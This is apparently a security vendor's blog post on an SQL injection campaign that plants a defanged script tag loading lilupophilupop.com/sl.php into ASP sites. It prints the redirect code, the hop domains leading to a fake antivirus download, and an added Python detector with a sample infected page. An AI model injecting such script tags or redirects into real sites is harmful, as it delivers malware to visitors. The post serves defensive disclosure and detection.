Per the ISC diary, SQL injection attacks against ASP websites backed by MSSQL are under way. The following string can be found embedded in the web pages of victim sites.

    ""></title><script src="hxxp://lilupophilupop.com/sl.php"></script>" 

 

(Figure 1: from ISC diary's comment)
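A check a site owner could run over rendered pages or exported text columns to find this marker, as an added example that is not from the original post or the ISC diary. It flags a closing `</title>` followed directly by a `<script>` with an absolute URL; the function names, the `trusted_hosts` parameter and the sample page are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Shape of the marker shown on the page: a stray closing </title> followed
# directly by a <script> whose src is an absolute URL (relative srcs are ignored).
MARKER = re.compile(
    r"</title>\s*<script\b[^>]*?\bsrc\s*=\s*[\"']?"
    r"(?P<url>(?:https?|hxxps?)://[^\"'\s>]+)",
    re.IGNORECASE,
)

def refang(url):
    """Turn a defanged hxxp:// URL back into http:// for parsing only."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)

def find_injected_scripts(html, trusted_hosts=()):
    """Return (line, host, path) for each marker whose host is not trusted."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for m in MARKER.finditer(html):
        parts = urlsplit(refang(m.group("url")))
        host = (parts.hostname or "").lower()
        if host in trusted:
            continue  # e.g. a CDN script the site really loads after <title>
        line = html.count("\n", 0, m.start()) + 1
        hits.append((line, host, parts.path))
    return hits

# Constructed sample: a product name field containing the string from the
# page (kept defanged), rendered once in <title> and once in the body.
SAMPLE_PAGE = """<html><head>
<title>Widget "></title><script src="hxxp://lilupophilupop.com/sl.php"></script></title>
<script src="/js/site.js"></script>
</head><body>
<h1>Widget "></title><script src="hxxp://lilupophilupop.com/sl.php"></script></h1>
<p>In stock</p>
</body></html>
"""

if __name__ == "__main__":
    for line, host, path in find_injected_scripts(SAMPLE_PAGE):
        print(f"line {line}: external script after </title> from {host}{path}")
```

A hit inside the body, as on line 5 of the sample, is the stronger signal, because a legitimate page has no `</title>` there.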

The link inside the malicious "sl.php" changes often:

    window.top.location.replace("hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl");

But we know it redirects to other hop sites that belong to the IP address 194.28.114.102:

  • hxxp://doutl31inesst.rr.nu
  • hxxp://rthur87seeks.rr.nu
  • hxxp://ift72hbot.rr.nu
  • and more...

Those sites return content such as the following:

    <meta http-equiv="refresh" content="0;url=hxxp://www3.simplerfnetwork.rr.nu/?nhyb3c0y=kt3ixnCYZ6msj93Z0KKljNrYsaifqJHi3OWfZpSWrtacpKCcm6WK" />

Finally, the visitor sees a fake AV scanning page (Figure 2) that lures people into downloading the installer. The detection rate is quite low, about 16%.

 

(Figure 2) 

The detailed attack path is as follows:

    [script] hxxp://lilupophilupop.com/sl.php
      [hop] hxxp://doutl31inesst.rr.nu/n.php?h=1&s=sl
      [hop] hxxp://www3.simplerfnetwork.rr.nu
      [hop] hxxp://www1.smartscanerjkm.rr.nu
        [download] hxxp://www1.smartscanerjkm.rr.nu

 

Detection rate in VirusTotal (7/43): 

 

Since 02/12/2011, AegisLab WebGuard has been able to block these malicious sites.

By AegisLab